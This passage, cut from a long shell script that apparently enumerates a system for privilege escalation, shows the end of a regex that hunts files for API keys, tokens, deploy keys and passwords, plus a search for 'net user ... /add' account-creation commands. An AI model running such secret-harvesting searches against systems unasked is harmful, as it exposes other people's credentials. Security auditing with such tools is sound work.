twilio_chat_account_api_service|twilio_configuration_sid|twilio_sid|twilio_token|twine_password|twitter_consumer_key|twitter_consumer_secret|twitteroauthaccesssecret| twitteroauthaccesstoken|unity_password|unity_serial|urban_key|urban_master_secret|urban_secret|us_east_1_elb_amazonaws_com|use_ssh| user_assets_access_key_id|user_assets_secret_access_key|usertravis|v_sfdc_client_secret|v_sfdc_password|vip_github_build_repo_deploy_key|vip_github_deploy_key| vip_github_deploy_key_pass|virustotal_apikey|visual_recognition_api_key|vscetoken|wakatime_api_key|watson_conversation_password|watson_device_password| watson_password|widget_basic_password|widget_basic_password_2|widget_basic_password_3|widget_basic_password_4|widget_basic_password_5|widget_fb_password| widget_fb_password_2|widget_fb_password_3|widget_test_server|wincert_password|wordpress_db_password|wordpress_db_user|wpjm_phpunit_google_geocode_api_key| wporg_password|wpt_db_password|wpt_db_user|wpt_prepare_dir|wpt_report_api_key|wpt_ssh_connect|wpt_ssh_private_key_base64|www_googleapis_com| yangshun_gh_password|yangshun_gh_token|yt_account_client_secret|yt_account_refresh_token|yt_api_key|yt_client_secret|yt_partner_client_secret| yt_partner_refresh_token|yt_server_api_key|zensonatypepassword|zhuliang_gh_token|zopim_account_key)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" 12915 search_for_regex "Net user add" "net user .+ /add" 12916 echo '' 12917 12918 12919 else 12920 echo "Regexes to search for API keys aren't activated, use param '-r' " 12921 fi 12922 12923 fi 12924 12925 fi 12926 12927 fi 12928 echo '' 12929 echo '' 12930 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi